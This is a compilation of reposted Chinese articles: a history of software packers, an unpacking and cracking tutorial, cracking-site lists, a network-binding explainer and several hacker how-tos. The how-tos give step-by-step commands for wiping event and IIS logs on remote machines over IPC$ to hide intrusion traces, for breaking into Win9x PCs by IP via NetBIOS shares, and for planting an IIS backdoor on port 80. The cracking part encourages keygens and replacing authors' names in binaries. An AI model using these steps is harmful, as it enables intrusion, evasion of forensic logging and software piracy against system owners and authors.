技术扫盲 软件加壳（转）

首先我想大家应该先明白“壳”的概念。在自然界中，我想大家对壳这东西应该都不会陌生了，植物用它来保护种子，动物用它来保护身体等等。同样，在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行，拿到控制权，然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然（但后来也出现了所谓的“壳中带籽”的壳）。由于这段程序和自然界的壳在功能上有很多相同的地方，基于命名的规则，大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样，其实都是命名上的方法罢了。

　　 最早提出“壳”这个概念的，据我所知，应该是当年推出脱壳软件 RCOPY 3 的作者熊焰先生。在几年前的 DOS 时代，“壳”一般都是指磁盘加密软件的段加密程序，可能是那时侯的加密软件还刚起步不久吧，所以大多数的加密软件（加壳软件）所生成的“成品”在“壳”和需要加密的程序之间总有一条比较明显的“分界线”。有经验的人可以在跟踪软件的运行以后找出这条分界线来，至于这样有什么用这个问题，就不用我多说了。但毕竟在当时，甚至现在这样的人也不是很多，所以当 RCOPY3 这个可以很容易就找出“分界线”，并可以方便的去掉“壳”的软件推出以后，立即就受到了很多人的注意。老实说，这个我当年在《电脑》杂志看到广告，在广州电脑城看到标着999元的软件，在当时来说，的确是有很多全新的构思，单内存生成 EXE 可执行文件这项，就应该是世界首创了。但它的思路在程序的表现上我认为还有很多可以改进的地方（虽然后来出现了可以加强其功力的 RO97），这个想法也在后来和作者的面谈中得到了证实。在这以后，同类型的软件想雨后春笋一般冒出来，记得住名字的就有： UNKEY、MSCOPY、UNALL .... 等等，但很多的软件都把磁盘解密当成了主攻方向，忽略了其它方面，当然这也为以后的“密界克星”“解密机器”等软件打下了基础，这另外的分支就不多祥谈了，相信机龄大一点的朋友都应该看过当时的广告了。

　　 解密（脱壳）技术的进步促进、推动了当时的加密（加壳）技术的发展。LOCK95和 BITLOK 等所谓的“壳中带籽”加密程序纷纷出笼，真是各出奇谋，把小小的软盘也折腾的够辛苦的了。正在国内的加壳软件和脱壳软件较量得正火红的时候，国外的“壳”类软件早已经发展到像 LZEXE 之类的压缩壳了。这类软件说穿了其实就是一个标准的加壳软件，它把 EXE 文件压缩了以后，再在文件上加上一层在软件被执行的时候自动把文件解压缩的“壳”来达到压缩 EXE 文件的目的。接着，这类软件也越来越多， PKEXE、AINEXE、UCEXE 和后来被很多人认识的 WWPACK 都属于这类软件，但奇怪的是，当时我看不到一个国产的同类软件。

　　 过了一段时间，可能是国外淘汰了磁盘加密转向使用软件序列号的加密方法吧，保护 EXE 文件不被动态跟踪和静态反编译就显得非常重要了。所以专门实现这样功能的加壳程序便诞生了。 MESS 、CRACKSTOP、HACKSTOP、TRAP、UPS 等等都是比较有名气的本类软件代表，当然，还有到现在还是数一数二的，由中国台湾同胞所写的 FSE 。其实以我的观点来看，这样的软件才能算是正宗的加壳软件。

　　在以上这些加壳软件的不断升级较劲中，很多软件都把比较“极端”技术用了上去，因为在这个时候 DOS 已经可以说是给众高手们玩弄在股掌之间了，什么保护模式、反 SICE 、逆指令等等。相对来说，在那段时间里发表的很多国外脱壳程序，根本就不能对付这么多的加壳大军，什么 UPC、TEU 等等都纷纷成为必防的对象，成绩比较理想的就只有 CUP386 了，反观国内，这段时间里也没了这方面的“矛盾斗争”。加壳软件门挥军直捣各处要岗重地，直到在我国遇到了 TR 这个铜墙铁壁以后，才纷纷败下阵来各谋对策，但这已经是一年多以后的事情了。我常想，如果 TR 能早两年“出生”的话，成就肯定比现在大得多，甚至盖过 SICE 也有可能。TR 发表的时候 WIN95 的流行已经成为事实，DOS 还有多少的空间，大家心里都清楚。但话又说回来， TR 的确是个好软件，比起当年的 RCOPY3 有过之而无不及，同时也证明了我们中国的 CRACK 实力（虽然有点过时）。这个时候，前面提到过的 FSE 凭着强劲的实力也渐渐的浮出了水面，独领风骚。其时已经是 1997 年年底了，我也走完了学生“旅程”。工作后在CFIDO 的 CRACK 区认识了 Ding-Boy ，不久 CRACK 区关了，我从此迷上了 INTERNET，并于98年6月建起了一个专门介绍“壳”的站台： http://topage.126.com ，放上了我所收集的所有“壳”类软件。在这段时间里，各种“壳”类软件也在不段的升级换代，但都没什么太大的进展，差不多就是 TR 和众加壳软件的版本数字之争而已。

 1998年8月，一个名为 UNSEC （揭秘）的脱壳软件发表了，它号称可以脱掉98年8月以前发表的所有壳。我测试之后，觉得并没传闻中的那么厉害，特别是兼容性更是令我不想再碰它。 Ding-Boy 给这个软件的作者提了很多建议，但寄去的 EMIAL 有如泥牛入海，可能是一怒之下吧，不久 Ding-Boy 的 BW （冲击波）就诞生了。这个使用内存一次定位生成 EXE 文件（后来放弃了）的脱壳软件，在我的站台公开后，得到了很多朋友们的肯定。要知道，从RCOPY 3 开始，绝大部分的脱壳软件都是要两次运行目标程序来确定 EXE 的重定位数据的。BW 的这一特点虽然有兼容性的问题，但也树立了自己的风格、特色。经过几个月的改善， BW 升级到了 2.0 版本，这个版本的推出可以说是 BW 的转折点，因为它已经是一个成熟、稳定脱壳软件了，它可以对付当时（现在）大多数的壳，包括当时最新的 FSE 0.6 等。更重要的是这个版本把选择壳的和软件“分界线”这个最令新手头疼的步骤简化到不能再简化的地步，使更多的朋友接受了它。另外，能加强 BW 功力的 CI 模式也是其它脱壳软件没有的东西。最近，BW 发表了最新的 2.5 BETA2 版本，增强了一些方面的功能，因它竟然可以脱掉号称最厉害的磁盘加密工具 LOCKKING 2.0 的加密壳，因而进一步奠定了它在“脱壳界”的地位。说到最新，就不能不提 GTR、LTR、EDUMP、ADUMP、UPS、UPX、APACK 这几个国外的好软件了，它们每个都有自己的特色，可以说都是当今各类“壳”中的最新代表了。（这些软件和详细介绍请到我的主页查阅）

　　由于 WINDOWS 3.1 只是基于 DOS 下的一个图形外壳，所以在这个平台下的“壳”类软件很少，见过的就只有像 PACKWIN 等几个有限的压缩工具，终难成气候。

　　 可能是 MICROSOFT 保留了 WIN95 的很多技术上的秘密吧，所以即便是 WIN95 已经推出了 3 年多的时间，也没见过在其上面运行的“壳”类软件。直到 98 年的中期，这样的软件才迟迟的出现，而这个时候 WIN98 也发表了有一段日子了。应该是有 DOS 下的经验吧，这类的软件不发表由自可，一发表就一大批地的冲了出来。先是加壳类的软件如： BJFNT、PELOCKNT 等，它们的出现，使暴露了 3 年多的 WIN95 下的 PE 格式 EXE 文件得到了很好的保护。大家都应该知道现在很多 WIN95 下的软件都是用注册码的方法来区分、确定合法与非法用户的吧，有了这类加壳软件，这种注册方法的安全性提高了不少，如果大家也有自己编的 WIN95 程序，就一定要多留意一下本类软件了。接着出现的就是压缩软件了，因为 WIN95 下运行的 EXE 文件“体积”一般都比较大，所以它的实用价值比起 DOS 下的压缩软件要大很多，这类的软件也很多，早些时候的 VBOX、PEPACK、PETITE 和最近才发表的 ASPACK、UPX 都是其中的佼佼者。在 DOS 下很流行的压缩软件 WWPACK 的作者也推出了对应 WIN95 版本的 WWPACK32，由于性能并不是十分的突出，所以用的人也不太多。由于压缩软件其实也是间接给软件加了壳，所以用它们来处理 EXE 也是很多软件作者喜欢做的事情，最近新发表的很多软件里都可以看到这些加壳、加压缩软件的名字了。有加壳就一定会有脱壳的，在 WIN95 下当然也不例外，但由于编这类软件比编加壳软件要难得多，所以到目前为止，我认为就只有 PROCDUMP 这个软件能称为通用脱壳软件了，它可以对付现在大多数的加壳、压缩软件所加的壳，的确是一个难得的精品。其它的脱壳软件多是专门针对某某加壳软件而编，虽然针对性强、效果好，但收集麻烦，而且这样的脱壳软件也不多。前些时候 TR 作者也顺应潮流发表了 TR 的 WIN95 版本： TRW ，由现在的版本来看可以对付的壳还不多，有待改进。

　　BW 的作者 Ding-Boy 最新发表了一个 WIN95 的 EXE 加壳软件 DBPE 。虽然它还不太成熟，但它可以为软件加上使用日期限制这个功能是其它加壳软件所没有的，或者以后的加壳软件真的会是像他说的那样可以：加壳和压缩并重、并施；随意加使用日期；加上注册码；加软件狗（磁盘）保护；加硬件序列号判别；加... 。

一.壳的概念 
作者编好软件后,编译成exe可执行文件 
1.有一些版权信息需要保护起来,不想让别人随便改动,如作者的姓名等 
2.需要把程序搞的小一点,从而方便使用 
于是,需要用到一些软件,他们能将exe可执行文件压缩,实现上述两个功能,这些软件称为加壳软件或压缩软件. 
它不同于一般的winzip,winrar等压缩软件.它是压缩exe可执行文件的,压缩后的文件可以直接运行.
壳（下）

二.加壳软件 
最常见的加壳软件ASPACK ,UPX,PEcompact 
不常用的加壳软件WWPACK32；PE-PACK ；PETITE ；NEOLITE

三.侦测壳和软件所用编写语言的软件 
1.侦测壳的软件fileinfo.exe 简称fi.exe(侦测壳的能力极强)使用方法:

第一种：待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行 
windows起始菜单的运行,键入fi aa

第二种：待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上

2.侦测壳和软件所用编写语言的软件language.exe(两个功能合为一体,很棒)推荐language2000中文版,我的

主页可下载傻瓜式软件,运行后选取待侦测壳的软件即可(open)

3.软件常用编写语言Delphi,VisualBasic(VB)---最难破,VisualC(VC)

脱壳

拿到一个软件,我们首先根据第一课的内容。侦测它的壳,然后我们要把它的壳脱去,还原它的本来面目.若它没有加壳,就省事不用脱壳了.

一.脱壳软件 
unaspack,caspr,upx,unpecompact,procdump 
二.使用方法 
(一)aspack壳 脱壳可用unaspack或caspr 
1.unaspack我的主页可下载中文版 
使用方法类似lanuage 
傻瓜式软件,运行后选取待脱壳的软件即可.缺点：只能脱aspack早些时候版本的壳,不能脱高版本的壳 
2.caspr 
第一种：待脱壳的软件(如aa.exe)和caspr.exe位于同一目录下,执行 
windows起始菜单的运行,键入 caspr aa.exe 
脱壳后的文件为aa.ex_,删掉原来的aa.exe,将aa.ex_改名为aa.exe即可 
使用方法类似fi优点：可以脱aspack任何版本的壳，脱壳能力极强 缺点：Dos界面 
第二种：将aa.exe的图标拖到caspr.exe的图标上 
***若已侦测出是aspack壳,用unaspack脱壳出错，说明是aspack高版本的壳，用caspr脱即可

(二)upx壳 脱壳可用upx 
待脱壳的软件(如aa.exe)和upx.exe位于同一目录下,执行windows起始菜单的运行,键入upx -d aa.exe

(三)PEcompact壳 脱壳用unpecompact 
使用方法类似lanuage。傻瓜式软件,运行后选取待脱壳的软件即可

(四)procdump 万能脱壳但不精,一般不要用 我的主页可下载中文版 
使用方法:运行后,先指定壳的名称,再选定欲脱壳软件,确定即可 
脱壳后的文件大于原文件。由于脱壳软件很成熟,手动脱壳一般用不到,不作介绍.

三. exe可执行文件编辑软件ultraedit 
下载它的汉化版本,它的注册机可从网上搜到 
ultraedit打开一个中文软件,若加壳,许多汉字不能被认出 
ultraedit打开一个中文软件,若未加壳或已经脱壳,许多汉字能被认出 
ultraedit可用来检验壳是否脱掉,以后它的用处还很多,请熟练掌握 
例如,可用它的替换功能替换作者的姓名为你的姓名 
注意字节必须相等,两个汉字替两个,三个替三个,不足处在ultraedit编辑器左边用00补

四.常用资源 
1.破解工具站点(以上工具从这里找) 
www.exetools.com 
www.pediy.com 
http://www.programmerstools.com(guowai/ 
www.cracknow.com 
2.软件站点 
www.newhua.com 
www.hktk.com 
http://www.esoftware.com.cn/ (强烈推荐,这里能找到软件的各个版本，尤其是旧版本。以后破解例子中所用软件一般在这儿都能找到） 
www.shareware.net.cn 
www.csdn.net

五.国外破解站点

-----------破解教程类:--------- 
1. +HCU Academy - http://Tsehp(dot)cjb(dot)net (Academy - Best)

2. The Krobar Collection: http://Krobar.cjb.net (Recommended)

3. CoDe_InSiDe - http://codeinside.cjb.net (Mine/CoDe's tutorials)

4. Eternal_Bliss - http://ebliss.cjb.net (Visual-Basic)

5. +Sandman - http://www.idca.com/~thesandman/index2.html (Best - Recommended)

6. Icezelion's Win32Asm - http:/win32asm.cjb.net (Coding)

7. tHE Egoiste - http://egoiste.da.ru (Great page with Crypto Stuff)

8. CrackMe's Page - http://crackmes.cjb.net (Recommended, dl all CrackMe from here)

--------破解工具类:--------- 
1. Programmers Tools - http://protools.cjb.net (Best)

2. Play Tools - http://playtools.cjb.net (Great)

3. EXE Tools - http://exetools.cjb.net/ (Average)

4. Aaron's Tools - http://mud.sz.jsinfo.net/per/aaron/index.htm (Average)

5. http://ProcDump32.cjb.net

6. Freak2freak.cjb.net

7. www.sysinternals.com (FileMon)

8. http://rpi.net.au/~ajohnson/resourcehacker

9. http://muaddib.immortaldescendants.org

10.http://frog.fsn.net (May be down)

-----------破解组织类:----------- 
1. PGC - http://www.pgc-force.com

2. The Millenium Group - http://tmg.da.ru/ (Keygen Factory :-)

3. HellForge - http://www.hellforge.org/

4. The Cracking Answer - http://tca2k.da.ru/

5. Immortal Descendants - http://www.immortaldescendants.org

6. TrickSoft - http://emc2k.com/tricksoft/

7. DOOM - http://deadlyzone.virtualave.net/Html/load.htm

8. http://www.suddendischarge.com/
简单黑客工具使用

1.小榕的elsave清除日志的使用:

　　先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""

　　清除目标系统的应用程序日志:

　　elsave -s \\ip -l "application" -C

　　清除目标系统的系统日志:

　　elsave -s \\ip -l "system"" -C

　　清除目标系统的安全日志:

　　elsave -s \\ip -l "security" -C

　　

　　2.windows2000日志的清除:

　　www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.

　　win2000中的其他一些日志:

　　安全日志:%winsystem%\system32\config\Secevent.evt

　　应用程序日志:%winsystem%\system32\config\AppEvent.evt

　　系统日志:%winsystem%\system32\config\SysEvent.evt

　　IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志

　　IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志

　　Scheduler服务日志:%winsystem%\schedlgu.txt

　　注册表所在项目:

　　[HKLM]\system\CurrentControlSet\Services\Eventlog

　　Schedluler服务注册表所在项目:

　　[HKLM]\SOFTWARE\Microsoft\SchedulingAgent

　　如果日志被从新定位,路径在注册表里面有记录.

　　 
清除日志

　　清除日志必须先停掉相关的服务后才能进行:

　　www和ftp日志必须想停w3svc: net stop w3svc

　　然后就可在相关日志目录下面把你想要删除的日志删除.

　　Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"

　　系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.

　　也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:

　　cleaniislog [logfile]　[.] [cleanIP]　.

　　说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录

　　举例:cleaniislog . 127.0.0.1

　　A.可以清除指定的的IP连接记录，保留其他IP记录。

　　B.当清除成功后，CleanIISLog会在系统日志中将本身的运行记录清除。

　　用法: CleanIISLog 　<.> 　<.>

　　: 指定要处理的日志文件，如果指定为“.”，则处理所有的日志文件注意：处理所有日志文件需要很长的时间）。

　　: 指定要清除的IP记录，如果指定为“.”，则清除所有的IP记录（不推荐这样做）。

　　CleanIISLog只能在本地运行，而且必须具有Administrators权限。
知道对方IP入侵别人的电脑
黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。 以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

浅谈绑定之应用

目前以太网已经普遍应用于运营领域，如小区接入、校园网等等。但由于以太网本身的开放性、共享性和弱管理性，采用以太网接入在用户管理和安全管理上必然存在诸多隐患。业界厂商都在寻找相应的解决方案以适应市场需求，绑定是目前普遍宣传和被应用的功能，如常见的端口绑定、MAC绑定、IP绑定、动态绑定、静态绑定等。其根本目的是要实现用户的唯一性确定，从而实现对以太网用户的管理。

　　一、绑定的由来

　　绑定的英文词是BINDING，其含义是将两个或多个实体强制性的关联在一起。一个大家比较熟悉的例子，就是配置网卡时，将网络协议与网卡驱动绑定在一起。其实在接入认证时，匹配用户名和密码，也是一种绑定，只有用户名存在并且密码匹配成功，才认为是合法用户。在这里，用户名已经可以唯一标识某个用户，与对应密码进行一一绑定。

　　二、绑定的分类

　　从绑定的实现机制上，可以分为AAA（服务器）有关绑定和AAA无关绑定；从绑定的时机上，可以分为静态绑定和动态绑定。

　　AAA是用户信息数据库，所以AAA有关绑定以用户信息为核心，认证时设备上传绑定的相关属性（端口、VLAN、MAC、IP等），AAA收到后与本地保存的用户信息匹配，匹配成功则允许用户上网，否则拒绝上网请求。

　　AAA无关绑定完全由接入设备实现。接入设备（如Lanswitch）上没有用户信息，所以AAA无关绑定只能以端口为核心，在端口上可以配置本端口可以接入的MAC（或IP）地址列表，只有其MAC地址属于此列表中的计算机才能够从该端口接入网络。

　　静态绑定是在用户接入网络前静态配置绑定的相关信息，用户接入认证时，匹配这些信息，只有匹配成功才能接入。

　　动态绑定的相关信息不是静态配置的，而是接入时才动态保存到接入设备上，接入网络后不允许用户再修改这些信息，一旦修改，则强制用户下线。

　　AAA相关绑定一般都是静态绑定，动态绑定一般都是在接入设备上实现的。接入设备离最终用户最近，用户所有的认证数据流和业务数据流都必须经过接入设备，只有认证数据流经过AAA，所以接入设备可以最容易最及时发现相关绑定信息的变化，也方便采取强制用户下线等处理措施。另外，网络中AAA一般只有一台，集中管理，接入设备却有很多，由分散的接入设备监视用户绑定信息的变化，可以减轻AAA的负担。

　　三、绑定的应用模式

　　除了常用的用户名与密码绑定外，可以用于绑定的属性主要有：端口、VLAN、MAC地址和IP地址。这些属性的特性不同，其绑定的应用模式也有较大差别。

　　1、IP地址绑定

　　1）解释

　　按照前边的定义标准，IP地址绑定可以分为AAA有关IP地址绑定、AAA无关IP地址绑定、IP地址静态绑定和IP地址动态绑定。

　　AAA有关IP地址绑定：在AAA上保存用户固定分配的IP地址，用户认证时，接入设备上传用户机器静态配置的IP地址，AAA将设备上传IP地址与本地保存IP地址比较，只有相等才允许接入。

　　AAA无关IP地址绑定：在接入设备上配置某个端口只能允许哪些IP地址接入，一个端口可以对应一个IP地址，也可以对应多个，用户访问网络时，只有源IP地址在允许的范围内，才可以接入。

　　IP地址静态绑定：接入网络时检查用户的IP地址是否合法。

　　IP地址动态绑定：用户上网过程中，如更改了自己的IP地址，接入设备能够获取到，并禁止用户继续上网

2）应用

　　教育网中，学生经常改变自己的IP地址，学校里IP地址冲突的问题比较严重，各学校网络中心承受的压力很大，迫切需要限制学生不能随便更改IP地址。可以采用以下方法做到用户名和IP地址的一一对应，解决IP地址问题。

　　如有DHCP Server，可以使用IP地址动态绑定，限制用户上网过程中更改IP地址。此时需要接入设备限制用户只能通过DHCP获取IP地址，静态配置的IP地址无效。如没有DHCP Server，可以使用AAA有关IP地址绑定和IP地址动态绑定相结合方式，限制用户只能使用固定IP地址接入，接入后不允许用户再修改IP地址。通过DHCP Server分配IP地址时，一般都可以为某个MAC地址分配固定的IP地址，再与AAA有关MAC地址绑定配合，变相的做到了用户和IP地址的一一对应。

　　2、MAC地址绑定

　　1）解释

　　与IP地址绑定类似，MAC地址绑定也可以分为AAA有关MAC地址绑定和AAA无关MAC地址绑定；MAC地址静态绑定和MAC地址动态绑定。

　　由于修改了MAC地址之后，必须重新启动网卡才能有效，重新启动网卡就意味着重新认证，所以MAC地址动态绑定意义不大。

　　2）应用

　　AAA有关MAC地址绑定在政务网或园区网中应用比较多，将用户名与机器网卡的MAC地址绑定起来，限制用户只能在固定的机器上上网，主要是为了安全和防止帐号盗用。但由于MAC地址也是可以修改的，所以这个方法还存在一些漏洞的。

　　3、端口绑定

　　1）解释

　　端口的相关信息包含接入设备的IP地址和端口号。

　　设备IP和端口号对最终用户都是不可见的，最终用户也无法修改端口信息，用户更换端口后，一般都需要重新认证，所以端口动态绑定的意义不大。由于AAA无关绑定是以端口为核心了，所以AAA无关端口绑定也没有意义。

　　有意义的端口绑定主要是AAA有关端口绑定和端口静态绑定。

　　2）应用

　　AAA有关端口绑定主要用于政务网、园区网和运营商网络，从而限制用户只能在特定的端口上接入。

　　4、VLAN绑定

　　1）解释

　　与端口绑定类似，VLAN相关信息也配置在接入设备上，最终用户无法修改，所以，VLAN动态绑定意义不大。对于AAA无关VLAN绑定，如只将端口与VLAN ID绑定在一起，那么如果用户自己连一个HUB，就会出现一旦此HUB上的一个用户认证通过，其他用户也可以上网的情况，造成网络接入不可控，所以一般不会单独使用AAA无关的VLAN绑定。

　　常用的VLAN绑定是AAA有关VLAN绑定和VLAN静态绑定。

　2）应用

　　如网络接入采用二层结构，上层是三层交换机，下层是二层交换机，认证点在三层交换机上，这种情况下，仅靠端口绑定只能限制用户所属的三层交换机端口，限制范围太大，无法限制用户所属的二层交换机端口。

　　使用AAA有关VLAN绑定和VLAN静态绑定就可以解决这个问题。

　　分别为二层交换机的每个下行端口各自设置不同的VLAN ID，二层交换机上行端口设置为VLAN透传，就产生了一个三层交换机端口对应多个VLAN ID的情况，每个VLAN ID对应一个二层交换机的端口。用户认证时，三层交换机将VLAN信息上传到AAA，AAA与预先设置的信息匹配，根据匹配成功与否决定是否允许用户接入。

　　此外，用户认证时，可以由AAA将用户所属的VLAN ID随认证响应报文下发到接入设备，这是另外一个角度的功能。虽然无法限制用户只能通过特定的二层交换机端口上网，但是可以限制用户无论从那个端口接入，使用的都是用一个VLAN ID。这样做的意义在于，一般的DHCP Server都可以根据VLAN划分地址池，用户无论在哪个位置上网，都会从相同的地址池中分配IP地址。出口路由器上可以根据源IP地址制定相应的访问权限。综合所有这些，变相的实现了在出口路由器上根据用户名制定访问权限的功能。

　　5、其它说明

　　标准的802.1x认证，只能控制接入端口的打开和关闭，如某个端口下挂了一个HUB，则只要HUB上有一个用户认证通过，该端口就处于打开状态，此HUB下的其他用户也都可以上网。为了解决这个问题，出现了基于MAC地址的认证，某个用户认证通过后，接入设备就将此用户的MAC地址记录下来，接入设备只允许所记录MAC地址发送的报文通过，其它MAC地址的报文一律拒绝。

　　为了提高安全性，接入设备除了记录用户的MAC地址外，还记录了用户的IP地址、VLAN ID等，收到的报文中，只要MAC地址、IP地址和VLAN ID任何一个与接入设备上保存的信息匹配不上，就不允许此报文通过。有的场合，也将这种方式称为接入设备的“MAC地址+IP地址+VLAN ID”绑定功能。功能上与前边的AAA无关的动态绑定比较类似，只是用途和目的不同。

　　四、业界厂商产品对绑定的支持

　　以上的常用绑定功能业界厂商都普遍支持，一些厂商还进行了更有特色的功能开发，如华为提供的以下增强功能：

　　1、绑定信息自学习

　　1）MAC地址自动学习

　　配置AAA相关MAC地址绑定功能时，MAC很长，难以记忆，输入时也经常出错，一旦MAC地址输入错误，就会造成用户无法上网，大大增加了AAA系统管理员的工作量。CAMS实现了MAC地址自动学习功能，可以学习用户第一次上网的MAC地址，并自动与用户绑定，既减少了工作量，又不会出错。以后用户MAC地址变更时，系统管理员将用户绑定的MAC地址清空，CAMS会再次自动学习用户MAC地址。

　　2）IP地址自动学习

　　与MAC地址自动学习类似。

　　2、一对多绑定

　　1）IP地址一对多绑定

　　用户可以绑定不只一个IP地址，而是可以绑定一个连续的地址段。这个功能主要应用于校园网中，一个教研室一般都会分配一个连续的地址段，教研室的每个用户都可以自由使用该地址段中的任何一个IP地址。教研室内部的网络结构和IP地址经常变化，将用户和教研室的整个地址段绑定后，可以由各教研室自己分配和管理内部IP地址，既不会因教研室内部IP地址分配问题影响整个校园网的正常运转，又可以大大减少AAA系统管理员的工作量。

　　2）端口一对多绑定

　　与IP地址一对多绑定类似，也存在端口一对多绑定的问题。CAMS将端口信息分成以下几个部分：接入设备IP地址-槽号-子槽号-端口号-VLAN ID，这几个部分按照范围由广到窄的顺序。任何一个部分都可以使用通配符，表示不限制具体数值。比如，端口号部分输入通配符，就表示将用户绑定在某台交换机下的某个槽号的某个子槽号的所有端口上，可以从其中的任何一个端口接入。

永远的后门

IIS是比较流行的www服务器，设置不当漏洞就很多。入侵iis服务器后留下后门，以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听，比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点（他们的管理员吃了苦头后）一般通过防火墙对端口进行限制，这样除了管理员开的端口外，其他端口就不能连接了。但是80端口是不可能关闭的（如果管理员没有吃错药）。那么我们可以通过在80端口留后门，来开启永远的后门。

如果你对此有情趣，跟我来........... 
当IIS启动CGI应用程序时，缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号，当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低，可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式，来提高权限。我们来看iis主进程本身是运行在localsystem账号下的，所以我们就可以得到最高localsystem的权限。 
入侵web服务器后，一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制，比如3389，或者类telnet text方式的控制，比如rnc。nc肯定是可以用的,其实这也足够了。 
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root 
KeyType : (STRING) "IIsWebVirtualDir" 
AppRoot : (STRING) "/LM/W3SVC/1/ROOT" 
AppFriendlyName : (STRING) "默认应用程序" 
AppIsolated : (INTEGER) 2 
AccessRead : (BOOLEAN) True 
AccessWrite : (BOOLEAN) False 
AccessExecute : (BOOLEAN) False 
AccessScript : (BOOLEAN) True 
AccessSource : (BOOLEAN) False 
AccessNoRemoteRead : (BOOLEAN) False 
AccessNoRemoteWrite : (BOOLEAN) False 
AccessNoRemoteExecute : (BOOLEAN) False 
AccessNoRemoteScript : (BOOLEAN) False 
HttpErrors : (LIST) (32 Items) 
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm" 
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm" 
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm" 
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm" 
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm" 
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm" 
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm" 
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm" 
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm" 
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm" 
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm" 
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm" 
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm" 
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm" 
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm" 
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm" 
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm" 
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm" 
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm" 
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm" 
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm" 
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm" 
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm" 
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm" 
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm" 
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm" 
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm" 
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm" 
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm" 
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm" 
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm" 
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True 
Path : (STRING) "c:\inetpub\wwwroot" 
AccessFlags : (INTEGER) 513 
[/w3svc/1/root/localstart.asp] 
[/w3svc/1/root/_vti_pvt] 
[/w3svc/1/root/_vti_log] 
[/w3svc/1/root/_private] 
[/w3svc/1/root/_vti_txt] 
[/w3svc/1/root/_vti_script] 
[/w3svc/1/root/_vti_cnf] 
[/w3svc/1/root/_vti_bin] 
不要告诉我你不知道上面的输出是什么！！！！ 
现在我们心里已经有底了，是不是！呵呵 管理员要倒霉了

